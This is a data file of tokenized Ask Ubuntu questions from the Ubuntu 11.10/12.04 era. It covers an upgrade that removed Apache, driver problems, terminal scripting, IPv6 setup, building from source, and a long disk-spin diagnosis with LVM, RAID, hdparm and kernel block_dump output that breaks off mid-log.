123654	what is the difference between upgrading from the system and using a cd ? my apache got hosed from cd upgrade	question pretty much sums it up . i was running ubuntu 11.10 and had apache serving a few virtual hosts . i popped in the ubuntu 12.04 cd ( beta 2 ) and rebooted . i choose to 'upgrade ubuntu 11.10 ' . the result is that my home folder is still intact and most settings seem to be there , but i could n't access any of my sites . i eventually realised that apache no longer exists on the system ! anyway , if i had done this at work ( and i could have ) , i would have made quite a mess for myself . i understand that it 's not ubuntus job to educate me and that as a techy i need to know these things . but i really thought it would be the same as upgrading from the update manager . can anyone explain ? many thanks , ten
123670	how i turn off backlight around switcher icons	in the launcher it is possible to switch off the backlight of the icons . how can i reach the same effect for the switcher icons ? i would like to pass from this : to this ( colored with gimp ) : i think it would be easier to identify the selected icon .
123674	wmctrl -a x-nautilus-session does n't activate nautilus window	nor wmctrl -r x-nautilus-session why ? how to get it working ? other windows are well controlled that way .
123676	nvdia driver causing problems after update	i 'm running ubuntu 11.10 . yesterday some packages have been updated , including the nvdia driver to 280.13 . after this update , my machine behaves very weird . my task bar is flickering and sometimes disappearing , screens do not pop up and the machine response time is very long or there is no response . i tried to deinstall the nvdia driver and install the '-current ' driver again , but this does not help . i also tried to remove the xconf file , but this also does n't help . how can i either fix the problem or downgrade to the current -1 version ? best , martijn
123678	how can i stop ubuntuone-syncd ?	i need to stop ubuntuone-syncd but i do n't know where to find the service that i need to stop .
123684	open a pair of tabbed terminal windows with titles	i am constantly opening up a pair of terminal windows which i like to have on separate tabs that i then use to ssh to the same pair of servers . i then set the titles of each tab to be that of the server i am connecting to . this is something i do manually every day and would love to be able to automate it . so i tried the following : gnome-terminal -- tab gnome-terminal -- tab gnome-terminal -t hello gnome-terminal -t=hello gnome-terminal -t= '' hello '' gnome-terminal -- title= '' hello '' gnome-terminal -- title=hello gnome-terminal -- title='hello' gnome-terminal -- tab -- title='hello' none of these options were able to open a new terminal window in a tab or with the title set to `` hello '' . i have n't even tried to tackle the problem of ssh-ing to the servers yet . what am i doing wrong ?
123685	deb package are not able to install in ubuntu 10.10	i can install every deb package in ubuntu 10.04 lts , but none of them can be install in ubuntu 10.10 . in ubuntu 10.04 lts , just simply double click on the deb package icon , and then click on `` install package '' in the gdebi-gtk window . but in ubuntu 11.10 , double click on deb package , waiting for a long long time , and finally the `` software center '' says that `` i386 error '' ! ! ! ! ! what 's wrong !
123690	how to install gnome2 on ubuntu 11.10	how can i install gnome2 desktop on ubuntu 11.10 ? i really hate unity desktop in ubuntu 11.10 ! unity desktop is absolutely terrible ! what terrible design ! the classification is absolutely terrible ! i really want to install gnome2 on ubuntu 11.10 . how can i do this ?
123696	how do i grab video from webofstories.com ?	i am trying to download videos from `` web of stories '' ( http : //www.webofstories.com/ ) . i tried all suggestions on how can i access flash files from streaming websites ? , but no one worked . my browser is firefox 11.0 . any ideas ?
123716	graphical effects are absent once installing through wubi	i 'm using dell inspiron intel i5 chipset , 4gb ram , 500gb hard drive with amd graphics . i 'm using windows 7 as my only os earlier . now i have installed 11.10 with help of wubi . i have allocated 30gb space for ubuntu . after installation it is working fine . but i could not get the 3d graphical effects as i expected.it is just functioning . do i want to install as the only operating system to enjoy those graphical effects ? can n't i enjoy the same thing with wubi installation ?
123720	high availability file server with ubuntu cloud	is it possible to achieve a high availability file server with ubuntu cloud ? i have four machines with 8tb of space each in 4 2tb hdd is it possible to manage storage space dynamically in ubuntu cloud 12.04 ? my requisites are : 8tb of available space for files i do n't need realtime failure recovery ( 10-20 minutes of downtime are fine ) . a nice to have would be some sort of `` time machine '' way of recovering files .
123721	what are the criteria for a user background to become login background on user selection ?	what are the criteria for a user background to become login background on user selection ? i 'm using 12.04 ( beta ) having jumped from 10.04 , so i do n't know whether it 's the same with 11.10 . basically there are 2 users set up on my machine . i 've assigned custom background pics for both users . on the login screen when you select one user for login , the whole background changes to the background for that user . however select the other user to log in and the background remains the default ubuntu splash until you actually log in . i do n't recall setting anything differently when i assigned the backgrounds , so i 'm a little confused ! is there something obvious i 've missed ? or more to the point , set by accident then forgotten ? !
123723	equivalent to windows group policies ( gpo ) in ubuntu	i am trying to apply gpo for client ubuntu machines in a centralized way . is it possible to apply gpo in ubuntu 10.04 ( other than using likewise enterprise ) ? until now my client machines have been able to login with with my windows domain/username with the help of likewise-open . but i want to restrict my client machines via group policy . is this possible without using the commercial packages , e.g. , likewise-enterprise and centrify ?
123725	how can i set /etc/network/interfaces to just autoconfigure ipv6 ?	i have a machine that i just want to run ipv6 on , no ipv4 . i want to use an autoconfigured ipv6 address - i have radvd running on my network and it is working fine . however there is no config in /etc/network/interfaces that i can set to do that . it supports static ipv6 , or if i create an ipv4 address on the interface it will set ipv6 , but i dont want to . currently reduced to bringing up the interface manually in /etc/rc.local but its messy . just want to be able to add `` iface eth0 inet6 auto '' to /etc/network/interfaces '' really .
123729	how can i install botanicula ?	i just got botanicula . when i unzip it , there is just a .air file . what do i do now ?
123731	bad vnc artefacts / tearing using ubuntu 12.04 default vnc server and tightvnc / realvnc client on windows	i am using the latest daily build of ubuntu 12.04 on an machine with asus p5g41t-m motherboard using the built-in graphics ( gma x4500 ) . i have not installed any additional software such as compiz , etc . i have enabled the default vnc server through the `` desktop sharing '' dialog in settings . when i connect from a windows 7 machine using realvnc or tightvnc , the screen does n't refresh correctly . there are old images left , the new windows do not appear entirely . i have tried setting disable_xdamage = true in gconf-editor as others recommended for 11.04 and 11.10 but it did n't help .
123739	can not install application from source using tar.gz archive	i tried to install utimer ( https : //launchpad.net/utimer ) by following the below steps . $ tar -zvxf utimer-0.4.tar.gz $ cd utimer-0.4 /utimer-0.4 $ ./configure /utimer-0.4 $ ls aclocal.m4 autogen.sh config.h.in configure copying depcomp install makefile.am makefile.in mkinstalldirs po readme.in authors changelog config.log configure.ac data doxyfile install-sh makefile.decl missing news readme src /utimer=0.4 $ make make : *** no targets specified and no makefile found . how shall i proceed ? also tried , /utimer-0.4 $ ./autogen.sh ========= preparing utimer ============ ======== running autoreconf =========== ./autogen.sh : line 3 : autoreconf : command not found installed autoconf . it installed 4 new packages - autoconf automake autotools-dev m4 but i get another error . ========= preparing utimer ============ ======== running autoreconf =========== ca n't exec `` libtoolize '' : no such file or directory at /usr/bin/autoreconf line 196 . use of uninitialized value in pattern match ( m// ) at /usr/bin/autoreconf line 196. autoreconf : entering directory ` . ' autoreconf : configure.ac : not using gettext autoreconf : running : aclocal -- force -i m4 aclocal : could n't open directory `m4 ' : no such file or directory autoreconf : aclocal failed with exit status : 1 how should one proceed when 'makefile ' is not generated ? thanks .
123744	disks constantly spinning no matter what i do ( jbd2 ) . i 'm on the brink of insanity	my disks have been spinning for months . it started with ubuntu 11.10 , and continues with 12.04 . i ca n't figure out how to stop it . i 've looked at various folks suggestions online about ext4 commit times , noatime , etc . i 've done what they said , but still no luck . it 's now like chinese water torture ... i hear those disks whir constantly it 's starting to drive me insane . i 've put a lot of info below . please help if you 're able . please ... please ... if you need any other info , i will happily provide it , just let me know . jdb2/dm-1-8 and jbd2/db-0-8 are typically the top io users . however , i 've shut almost everything down , `` echo 1 > /proc/sys/vm/block_dump '' , and watched dmesg . jbd2/dm-1 and jdb2/dm-0 flush reliably every 60 seconds , yet the hard drive continues to spin in the interim . dm-1 is mounted on /home , and dm-0 is mounted as / . my setup is a bit complicated : i have a ssd where root lives , and then two regular drives mirrored with software raid where other lvm paritions live . on top of this lives lvm partitions . then , /home is encrypted with ecryptfs . here 's pvdisplay output : -- - physical volume -- - pv name /dev/sdd6 vg name root_vg pv size 211.46 gib / not usable 4.00 mib allocatable yes pe size 4.00 mib total pe 54134 free pe 18372 allocated pe 35762 pv uuid 1aqbph-m45y-0bs5-fu7t-zmr7-slle-itlner -- - physical volume -- - pv name /dev/md2 vg name ff_vg pv size 1.82 tib / not usable 2.87 mib allocatable yes pe size 4.00 mib total pe 476931 free pe 158882 allocated pe 318049 pv uuid em7a94-ijwz-ydmo-dbci-e3n6-ezaa-hx50vj here 's the definition and state of that raid partition : /dev/md2 : version : 1.2 creation time : thu jan 12 05:57:20 2012 raid level : raid1 array size : 1953512312 ( 1863.01 gib 2000.40 gb ) used dev size : 1953512312 ( 1863.01 gib 2000.40 gb ) raid devices : 2 total devices : 2 persistence : superblock is persistent update time : fri apr 20 09:11:18 2012 state : clean active devices : 2 working devices : 2 failed devices : 0 spare devices : 0 name : mymachine:2 ( local to host mymachine ) uuid : d2d341dc : e3a8c880:3856e567:02f6ab33 events : 124244 number major minor raiddevice state 3 8 1 0 active sync /dev/sda1 2 8 33 1 active sync /dev/sdc1 and here 's lvdisplay output : -- - logical volume -- - lv name /dev/root_vg/root_lv vg name root_vg lv uuid gpqjds-24tr-wo9o-sfdx-7iwc-2o5p-goew05 lv write access read/write lv status available # open 1 lv size 139.70 gib current le 35762 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:0 -- - logical volume -- - lv name /dev/ff_vg/home_lv vg name ff_vg lv uuid 6azo1j-s55p-werd-xmmz-jopl-dkjd-cahgdr lv write access read/write lv status available # open 1 lv size 698.49 gib current le 178814 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:1 -- - logical volume -- - lv name /dev/ff_vg/swap_lv vg name ff_vg lv uuid ea5epe-ixch-zgr7-dmal-uczi-5nsw-sn6gsz lv write access read/write lv status available # open 2 lv size 22.35 gib current le 5722 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:2 -- - logical volume -- - lv name /dev/ff_vg/opt_lv vg name ff_vg lv uuid bugidk-pdtg-msud-1gvn-decf-qzzr-2omqrt lv write access read/write lv status available # open 1 lv size 139.70 gib current le 35762 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:3 -- - logical volume -- - lv name /dev/ff_vg/vms_lv vg name ff_vg lv uuid ajkqgb-l0pp-y3tk-rs9e-p4ox-xi0n-1tcxbh lv write access read/write lv status available # open 1 lv size 102.45 gib current le 26226 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:4 -- - logical volume -- - lv name /dev/ff_vg/data_lv vg name ff_vg lv uuid 4g38kt-ggv8-b12c-wpxf-buhb-zxtj-mgl0tx lv write access read/write lv status available # open 1 lv size 279.39 gib current le 71525 segments 1 allocation inherit read ahead sectors auto - currently set to 256 block device 252:5 here 's mtab : /dev/mapper/root_vg-root_lv / ext4 rw , commit=60 , errors=remount-ro 0 0 proc /proc proc rw , noexec , nosuid , nodev 0 0 sysfs /sys sysfs rw , noexec , nosuid , nodev 0 0 none /sys/fs/fuse/connections fusectl rw 0 0 none /sys/kernel/debug debugfs rw 0 0 none /sys/kernel/security securityfs rw 0 0 udev /dev devtmpfs rw , mode=0755 0 0 devpts /dev/pts devpts rw , noexec , nosuid , gid=5 , mode=0620 0 0 tmpfs /run tmpfs rw , noexec , nosuid , size=10 % , mode=0755 0 0 none /run/lock tmpfs rw , noexec , nosuid , nodev , size=5242880 0 0 none /run/shm tmpfs rw , nosuid , nodev 0 0 /dev/sdd1 /boot ext2 rw 0 0 /dev/mapper/ff_vg-home_lv /home ext4 rw , noatime , commit=60 0 0 /dev/mapper/ff_vg-data_lv /data ext4 rw , noatime , commit=60 0 0 /dev/mapper/ff_vg-vms_lv /vms ext4 rw , noatime , commit=60 0 0 /dev/mapper/ff_vg-opt_lv /opt ext4 rw , noatime , commit=60 0 0 binfmt_misc /proc/sys/fs/binfmt_misc binfmt_misc rw , noexec , nosuid , nodev 0 0 /home/myuser/.private /home/myuser ecryptfs ecryptfs_check_dev_ruid , ecryptfs_cipher=aes , ecryptfs_key_bytes=16 , ecryptfs_unlink_sigs , ecryptfs_sig=9823493038bb4fe3 , ecryptfs_fnek_sig=5687e349843fce9cb 0 0 gvfs-fuse-daemon /home/myuser/.gvfs fuse.gvfs-fuse-daemon rw , nosuid , nodev , user=myuser 0 0 here 's hdparm -i on each device : # # # # # # # # # # # /dev/sdd /dev/sdd : ata device , with non-removable media model number : m4-ct256m4ssd2 serial number : xxxxxxxxxxxxxxxxxxxxxx firmware revision : 0009 transport : serial , ata8-ast , sata 1.0a , sata ii extensions , sata rev 2.5 , sata rev 2.6 , sata rev 3.0 standards : used : unknown ( minor revision code 0x0028 ) supported : 9 8 7 6 5 likely used : 9 configuration : logical max current cylinders 16383 16383 heads 16 16 sectors/track 63 63 -- chs current addressable sectors : 16514064 lba user addressable sectors : 268435455 lba48 user addressable sectors : 500118192 logical sector size : 512 bytes physical sector size : 512 bytes logical sector-0 offset : 0 bytes device size with m = 1024*1024 : 244198 mbytes device size with m = 1000*1000 : 256060 mbytes ( 256 gb ) cache/buffer size = unknown form factor : 2.5 inch nominal media rotation rate : solid state device capabilities : lba , iordy ( can be disabled ) queue depth : 32 standby timer values : spec 'd by standard , with device specific minimum r/w multiple sector transfer : max = 16 current = 16 advanced power management level : 254 dma : mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 udma4 *udma5 cycle time : min=120ns recommended=120ns pio : pio0 pio1 pio2 pio3 pio4 cycle time : no flow control=120ns iordy flow control=120ns commands/features : enabled supported : * smart feature set security mode feature set * power management feature set * write cache * look-ahead * host protected area feature set * write_buffer command * read_buffer command * nop cmd * download_microcode * advanced power management feature set set_max security extension * 48-bit address feature set * device configuration overlay feature set * mandatory flush_cache * flush_cache_ext * smart error logging * smart self-test * general purpose logging feature set * write_ { dma|multiple } _fua_ext * 64-bit world wide name * idle_immediate with unload write-read-verify feature set * write_uncorrectable_ext command * { read , write } _dma_ext_gpl commands * segmented download_microcode * gen1 signaling speed ( 1.5gb/s ) * gen2 signaling speed ( 3.0gb/s ) * gen3 signaling speed ( 6.0gb/s ) * native command queueing ( ncq ) * host-initiated interface power management * phy event counters * ncq priority information dma setup auto-activate optimization device-initiated interface power management * software settings preservation * smart command transport ( sct ) feature set * sct lba segment access ( ac2 ) * sct error recovery control ( ac3 ) * sct features control ( ac4 ) * sct data tables ( ac5 ) * data set management trim supported ( limit 8 blocks ) * deterministic read data after trim security : master password revision code = xxxxx supported not enabled not locked not frozen not expired : security count supported : enhanced erase 2min for security erase unit . 2min for enhanced security erase unit . logical unit wwn device identifier : xxxxxxxxxxxxxxxxxx naa : 5 ieee oui : xxxxx unique id : xxxxxxxx # # # # # # # # # # # # # # # # # # # /dev/sda /dev/sda : ata device , with non-removable media model number : wdc wd20earx-00pasb0 serial number : xxxxxxxxxxxxxxxxxx firmware revision : 51.0ab51 transport : serial , sata 1.0a , sata ii extensions , sata rev 2.5 , sata rev 2.6 , sata rev 3.0 standards : supported : 8 7 6 5 likely used : 8 configuration : logical max current cylinders 16383 16383 heads 16 16 sectors/track 63 63 -- chs current addressable sectors : 16514064 lba user addressable sectors : 268435455 lba48 user addressable sectors : 3907029168 logical sector size : 512 bytes physical sector size : 4096 bytes logical sector-0 offset : 0 bytes device size with m = 1024*1024 : 1907729 mbytes device size with m = 1000*1000 : 2000398 mbytes ( 2000 gb ) cache/buffer size = unknown capabilities : lba , iordy ( can be disabled ) queue depth : 32 standby timer values : spec 'd by standard , with device specific minimum r/w multiple sector transfer : max = 16 current = 0 dma : mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 udma4 udma5 *udma6 cycle time : min=120ns recommended=120ns pio : pio0 pio1 pio2 pio3 pio4 cycle time : no flow control=120ns iordy flow control=120ns commands/features : enabled supported : * smart feature set security mode feature set * power management feature set * write cache * look-ahead * host protected area feature set * write_buffer command * read_buffer command * nop cmd * download_microcode power-up in standby feature set * set_features required to spinup after power up set_max security extension * 48-bit address feature set * device configuration overlay feature set * mandatory flush_cache * flush_cache_ext * smart error logging * smart self-test * general purpose logging feature set * 64-bit world wide name * write_uncorrectable_ext command * { read , write } _dma_ext_gpl commands * segmented download_microcode * gen1 signaling speed ( 1.5gb/s ) * gen2 signaling speed ( 3.0gb/s ) * gen3 signaling speed ( 6.0gb/s ) * native command queueing ( ncq ) * host-initiated interface power management * phy event counters * ncq priority information dma setup auto-activate optimization * software settings preservation * smart command transport ( sct ) feature set * sct lba segment access ( ac2 ) * sct features control ( ac4 ) * sct data tables ( ac5 ) unknown 206 [ 12 ] ( vendor specific ) unknown 206 [ 13 ] ( vendor specific ) security : master password revision code = xxxxx supported not enabled not locked not frozen not expired : security count supported : enhanced erase 396min for security erase unit . 396min for enhanced security erase unit . logical unit wwn device identifier : xxxxxxxxxxxxxxxx naa : x ieee oui : xxxxxx unique id : xxxxxxxx checksum : correct # # # # # # # # # # # # # # # # # # # /dev/sdc /dev/sdc : ata device , with non-removable media model number : wdc wd20earx-00pasb0 serial number : xxxxxxxxx firmware revision : 51.0ab51 transport : serial , sata 1.0a , sata ii extensions , sata rev 2.5 , sata rev 2.6 , sata rev 3.0 standards : supported : 8 7 6 5 likely used : 8 configuration : logical max current cylinders 16383 16383 heads 16 16 sectors/track 63 63 -- chs current addressable sectors : 16514064 lba user addressable sectors : 268435455 lba48 user addressable sectors : 3907029168 logical sector size : 512 bytes physical sector size : 4096 bytes logical sector-0 offset : 0 bytes device size with m = 1024*1024 : 1907729 mbytes device size with m = 1000*1000 : 2000398 mbytes ( 2000 gb ) cache/buffer size = unknown capabilities : lba , iordy ( can be disabled ) queue depth : 32 standby timer values : spec 'd by standard , with device specific minimum r/w multiple sector transfer : max = 16 current = 0 dma : mdma0 mdma1 mdma2 udma0 udma1 udma2 udma3 udma4 udma5 *udma6 cycle time : min=120ns recommended=120ns pio : pio0 pio1 pio2 pio3 pio4 cycle time : no flow control=120ns iordy flow control=120ns commands/features : enabled supported : * smart feature set security mode feature set * power management feature set * write cache * look-ahead * host protected area feature set * write_buffer command * read_buffer command * nop cmd * download_microcode power-up in standby feature set * set_features required to spinup after power up set_max security extension * 48-bit address feature set * device configuration overlay feature set * mandatory flush_cache * flush_cache_ext * smart error logging * smart self-test * general purpose logging feature set * 64-bit world wide name * write_uncorrectable_ext command * { read , write } _dma_ext_gpl commands * segmented download_microcode * gen1 signaling speed ( 1.5gb/s ) * gen2 signaling speed ( 3.0gb/s ) * gen3 signaling speed ( 6.0gb/s ) * native command queueing ( ncq ) * host-initiated interface power management * phy event counters * ncq priority information dma setup auto-activate optimization * software settings preservation * smart command transport ( sct ) feature set * sct lba segment access ( ac2 ) * sct features control ( ac4 ) * sct data tables ( ac5 ) unknown 206 [ 12 ] ( vendor specific ) unknown 206 [ 13 ] ( vendor specific ) security : master password revision code = xxxxx supported not enabled not locked not frozen not expired : security count supported : enhanced erase 388min for security erase unit . 388min for enhanced security erase unit . logical unit wwn device identifier : xxxxxxxxxxxxxxxxx naa : x ieee oui : xxxxxx unique id : xxxxxxxxx checksum : correct after shutting most things down , including rsyslogd , and running iotop for a few minutes , there are the top talkers . notice how little i/o is going on , yet the disks keep spinning : total disk read : 0.00 b/s | total disk write : 0.00 b/s tid prio user disk read disk write swapin io > command 1207 be/3 root 0.00 b 24.00 k 0.00 % 0.02 % [ jbd2/dm-1-8 ] 436 be/3 root 0.00 b 20.00 k 0.00 % 0.00 % [ jbd2/dm-0-8 ] 1 be/4 root 0.00 b 0.00 b 0.00 % 0.00 % init 2 be/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ kthreadd ] 3 be/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ ksoftirqd/0 ] 6 rt/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ migration/0 ] 7 rt/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ watchdog/0 ] 8 rt/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ migration/1 ] 10 be/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ ksoftirqd/1 ] 12 rt/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ watchdog/1 ] 13 rt/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ migration/2 ] 14 be/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ kworker/2:0 ] 15 be/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ ksoftirqd/2 ] 16 rt/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ watchdog/2 ] 17 rt/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ migration/3 ] 19 be/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ ksoftirqd/3 ] 20 rt/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ watchdog/3 ] 21 rt/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ migration/4 ] 22 be/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ kworker/4:0 ] 23 be/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ ksoftirqd/4 ] 24 rt/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ watchdog/4 ] 25 rt/4 root 0.00 b 0.00 b 0.00 % 0.00 % [ migration/5 ] and finally , here 's block_dump output . this is for a two minute period ( roughly ) ... there were pauses when nothing was going on , yet the disks still spin : [ 74559.007437 ] flush-252:0 ( 1233 ) : write block 54790360 on dm-0 ( 8 sectors ) [ 74562.199606 ] console-kit-dae ( 1953 ) : dirtied inode 1573426 ( history ) on dm-0 [ 74562.199616 ] console-kit-dae ( 1953 ) : dirtied inode 1573426 ( history ) on dm-0 [ 74562.199620 ] console-kit-dae ( 1953 ) : dirtied inode 1573426 ( history ) on dm-0 [ 74562.898697 ] dmesg ( 13435 ) : dirtied inode 326099 ( out ) on tmpfs [ 74568.992176 ] flush-252:0 ( 1233 ) : write block 50331928 on dm-0 ( 8 sectors ) [ 74568.992192 ] flush-252:0 ( 1233 ) : write block 50331936 on dm-0 ( 8 sectors ) [ 74568.992200 ] flush-252:0 ( 1233 ) : write block 50332016 on dm-0 ( 8 sectors ) [ 74568.992208 ] flush-252:0 ( 1233 ) : write block 54525968 on dm-0 ( 8 sectors ) [ 74568.992215 ] flush-252:0 ( 1233 ) : write block 54526080 on dm-0 ( 8 sectors ) [ 74568.992222 ] flush-252:0 ( 1233 ) : write block 54527088 on dm-0 ( 8 sectors ) [ 74568.992228 ] flush-252:0 ( 1233 ) : write block 54593984 on dm-0 ( 8 sectors ) [ 74568.992234 ] flush-252:0 ( 1233 ) : write block 83886088 on dm-0 ( 8 sectors ) [ 74568.992240 ] flush-252:0 ( 1233 ) : write block 83886336 on dm-0 ( 8 sectors ) [ 74568.992247 ] flush-252:0 ( 1233 ) : write block 159385288 on dm-0 ( 8 sectors ) [ 74568.992260 ] flush-252:0 ( 1233 ) : write block 159386960 on dm-0 ( 8 sectors ) [ 74568.992266 ] flush-252:0 ( 1233 ) : write block 192937992 on dm-0 ( 8 sectors ) [ 74568.992273 ] flush-252:0 ( 1233 ) : write block 213910472 on dm-0 ( 8 sectors ) [ 74568.992279 ] flush-252:0 ( 1233 ) : write block 213910720 on dm-0 ( 8 sectors ) [ 74568.992285 ] flush-252:0 ( 1233 ) : write block 213910728 on dm-0 ( 8 sectors ) [ 74568.992291 ] flush-252:0 ( 1233 ) : write block 213910736 on dm-0 ( 8 sectors ) [ 74568.992296 ] flush-252:0 ( 1233 ) : write block 213910744 on dm-0 ( 8 sectors ) [ 74568.992301 ] flush-252:0 ( 1233 ) : write block 213910752 on dm-0 ( 8 sectors ) [ 74568.992306 ] flush-252:0 ( 1233 ) : write block 213910760 on dm-0 ( 8 sectors ) [ 74568.992311 ] flush-252:0 ( 1233 ) : write block 213910768 on dm-0 ( 8 sectors ) [ 74568.992316 ] flush-252:0 ( 1233 ) : write block 213910776 on dm-0 ( 8 sectors ) [ 74568.992322 ] flush-252:0 ( 1233 ) : write block 213911184 on dm-0 ( 8 sectors ) [ 74568.992329 ] flush-252:0 ( 1233 ) : write block 213911192 on dm-0 ( 8 sectors ) [ 74568.992335 ] flush-252:0 ( 1233 ) : write block 213911200 on dm-0 ( 8 sectors ) [ 74568.992342 ] flush-252:0 ( 1233 ) : write block 213911208 on dm-0 ( 8 sectors ) [ 74568.992347 ] flush-252:0 ( 1233 ) : write block 213911216 on dm-0 ( 8 sectors ) [ 74568.992353 ] flush-252:0 ( 1233 ) : write block 213911224 on dm-0 ( 8 sectors ) [ 74568.992358 ] flush-252:0 ( 1233 ) : write block 213912152 on dm-0 ( 8 sectors ) [ 74568.992364 ] flush-252:0 ( 1233 ) : write block 213912256 on dm-0 ( 8 sectors ) [ 74568.992371 ] flush-252:0 ( 1233 ) : write block 213912352 on dm-0 ( 8 sectors ) [ 74568.992474 ] flush-252:0 ( 1233 ) : write block 213912360 on dm-0 ( 8 sectors ) [ 74568.992480 ] flush-252:0 ( 1233 ) : write block 213912440 on dm-0 ( 8 sectors ) [ 74568.992486 ] flush-252:0 ( 1233 ) : write block 213912448 on dm-0 ( 8 sectors ) [ 74568.992491 ] flush-252:0 ( 1233 ) : write block 213912456 on dm-0 ( 8 sectors ) [ 74568.992496 ] flush-252:0 ( 1233 ) : write block 213912472 on dm-0 ( 8 sectors ) [ 74568.992502 ] flush-252:0 ( 1233 ) : write block 213912480 on dm-0 ( 8 sectors ) [ 74568.992507 ] flush-252:0 ( 1233 ) : write block 213912504 on dm-0 ( 8 sectors ) [ 74568.992513 ] flush-252:0 ( 1233 ) : write block 213912536 on dm-0 ( 8 sectors ) [ 74568.992521 ] flush-252:0 ( 1233 ) : write block 213912544 on dm-0 ( 8 sectors ) [ 74568.992526 ] flush-252:0 ( 1233 ) : write block 213912552 on dm-0 ( 8 sectors ) [ 74568.992531 ] flush-252:0 ( 1233 ) : write block 213912560 on dm-0 ( 8 sectors ) [ 74568.992536 ] flush-252:0 ( 1233 ) : write block 213912568 on dm-0 ( 8 sectors ) [ 74568.992541 ] flush-252:0 ( 1233 ) : write block 213912576 on dm-0 ( 8 sectors ) [ 74568.992546 ] flush-252:0 ( 1233 ) : write block 213912584 on dm-0 ( 8 sectors ) [ 74568.992552 ] flush-252:0 ( 1233 ) : write block 213912592 on dm-0 ( 8 sectors ) [ 74568.992557 ] flush-252:0 ( 1233 ) : write block 213912600 on dm-0 ( 8 sectors ) [ 74568.992563 ] flush-252:0 ( 1233 ) : write block 213912608 on dm-0 ( 8 sectors ) [ 74568.992568 ] flush-252:0 ( 1233 ) : write block 213912616 on dm-0 ( 8 sectors ) [ 74568.992573 ] flush-252:0 ( 1233 ) : write block 213912624 on dm-0 ( 8 sectors ) [ 74568.992578 ] flush-252:0 ( 1233 ) : write block 213912632 on dm-0 ( 8 sectors ) [ 74568.992583 ] flush-252:0 ( 1233 ) : write block 213912640 on dm-0 ( 8 sectors ) [ 74568.992589 ] flush-252:0 ( 1233 ) : write block 213912648 on dm-0 ( 8 sectors ) [ 74568.992595 ] flush-252:0 ( 1233 ) : write block 213912656 on dm-0 ( 8 sectors ) [ 74568.992600 ] flush-252:0 ( 1233 ) : write block 213912664 on dm-0 ( 8 sectors ) [ 74568.992605 ] flush-252:0 ( 1233 ) : write block 213912672 on dm-0 ( 8 sectors ) [ 74568.992610 ] flush-252:0 ( 1233 ) : write block 213912680 on dm-0 ( 8 sectors ) [ 74568.992615 ] flush-252:0 ( 1233 ) : write block 213912688 on dm-0 ( 8 sectors ) [ 74568.992620 ] flush-252:0 ( 1233 ) : write block 213912696 on dm-0 ( 8 sectors ) [ 74568.992625 ] flush-252:0 ( 1233 ) : write block 213912704 on dm-0 ( 8 sectors ) [ 74568.992631 ] flush-252:0 ( 1233 ) : write block 213912776 on dm-0 ( 8 sectors ) [ 74568.992636 ] flush-252:0 ( 1233 ) : write block 213912784 on dm-0 ( 8 sectors ) [ 74568.992641 ] flush-252:0 ( 1233 ) : write block 213912792 on dm-0 ( 8 sectors ) [ 74568.992646 ] flush-252:0 ( 1233 ) : write block 213912800 on dm-0 ( 8 sectors ) [ 74568.992652 ] flush-252:0 ( 1233 ) : write block 213912808 on dm-0 ( 8 sectors ) [ 74568.992657 ] flush-252:0 ( 1233 ) : write block 213912816 on dm-0 ( 8 sectors ) [ 74568.992695 ] flush-252:0 ( 1233 ) : write block 213912824 on dm-0 ( 8 sectors ) [ 74568.992701 ] flush-252:0 ( 1233 ) : write block 213912832 on dm-0 ( 8 sectors ) [ 74568.992706 ] flush-252:0 ( 1233 ) : write block 213912840 on dm-0 ( 8 sectors ) [ 74568.992711 ] flush-252:0 ( 1233 ) : write block 213912848 on dm-0 ( 8 sectors ) [ 74568.992716 ] flush-252:0 ( 1233 ) : write block 213912856 on dm-0 ( 8 sectors ) [ 74568.992721 ] flush-252:0 ( 1233 ) : write block 213912864 on dm-0 ( 8 sectors ) [ 74568.992726 ] flush-252:0 ( 1233 ) : write block 213912872 on dm-0 ( 8 sectors ) [ 74568.992731 ] flush-252:0 ( 1233 ) : write block 213912880 on dm-0 ( 8 sectors ) [ 74568.992736 ] flush-252:0 ( 1233 ) : write block 213912888 on dm-0 ( 8 sectors ) [ 74568.992742 ] flush-252:0 ( 1233 ) : write block 213912896 on dm-0 ( 8 sectors ) [ 74568.992747 ] flush-252:0 ( 1233 ) : write block 213912904 on dm-0 ( 8 sectors ) [ 74568.992752 ] flush-252:0 ( 1233 ) : write block 213912912 on dm-0 ( 8 sectors ) [ 74568.992757 ] flush-252:0 ( 1233 ) : write block 213912920 on dm-0 ( 8 sectors ) [ 74568.992761 ] flush-252:0 ( 1233 ) : write block 213912928 on dm-0 ( 8 sectors ) [ 74568.992766 ] flush-252:0 ( 1233 ) : write block 213912936 on dm-0 ( 8 sectors ) [ 74568.992776 ] flush-252:0 ( 1233 ) : write block 213912944 on dm-0 ( 8 sectors ) [ 74568.992781 ] flush-252:0 ( 1233 ) : write block 213912952 on dm-0 ( 8 sectors ) [ 74568.992786 ] flush-252:0 ( 1233 ) : write block 213912960 on dm-0 ( 8 sectors ) [ 74568.992791 ] flush-252:0 ( 1233 ) : write block 276825680 on dm-0 ( 8 sectors ) [ 74568.992803 ] flush-252:0 ( 1233 ) : write block 0 on dm-0 ( 8 sectors ) [ 74568.992809 ] flush-252:0 ( 1233 ) : write block 8 on dm-0 ( 8 sectors 